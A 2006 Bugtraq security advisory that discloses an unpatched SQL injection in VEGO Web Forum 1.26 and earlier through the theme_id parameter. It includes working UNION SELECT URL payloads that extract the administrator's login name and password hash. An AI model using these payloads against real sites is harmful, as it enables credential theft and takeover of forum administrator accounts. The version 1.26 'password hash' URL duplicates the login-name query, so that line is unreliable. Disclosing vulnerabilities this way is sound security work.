Date: 1 Jan 2006 22:45:52 -0000
From: alex@...ln.com
To: bugtraq@...urityfocus.com
Subject: [eVuln] VEGO Web Forum SQL Injection Vulnerability


New eVuln Advisory:
VEGO Web Forum SQL Injection Vulnerability

--------------------Summary----------------
Vendor: VEGO
Software: VEGO Web Forum
Versions: 1.26 and earlier
Critical Level: Moderate
Type: SQL Injection
Remote: yes
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (alex@...ln.com)
eVuln ID: EV0001
-----------------Description--------------
Vulnerable scripts:
php/functions.php
php/functions_update.php
php/functions_display.php

Variable theme_id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Administrator's authentication is threatened.

-------------------Exploit-----------------
Administrator's login name.

For version 1.26:
http://hostname/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*

Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4%20from%20vwf_users% 20where%20userid=1/*


Hash of administrator's password.

For version 1.26:
http://hostname/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*

Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,pass, 4%20from%20vwf_users% 20where%20userid=1/*	

--------------Credit---------------------

Original Advisory:
http://evuln.com/vulns/1/summary.html

Discovered by: Aliaksandr Hartsuyeu (alex@...ln.com)

Powered by blists - more mailing lists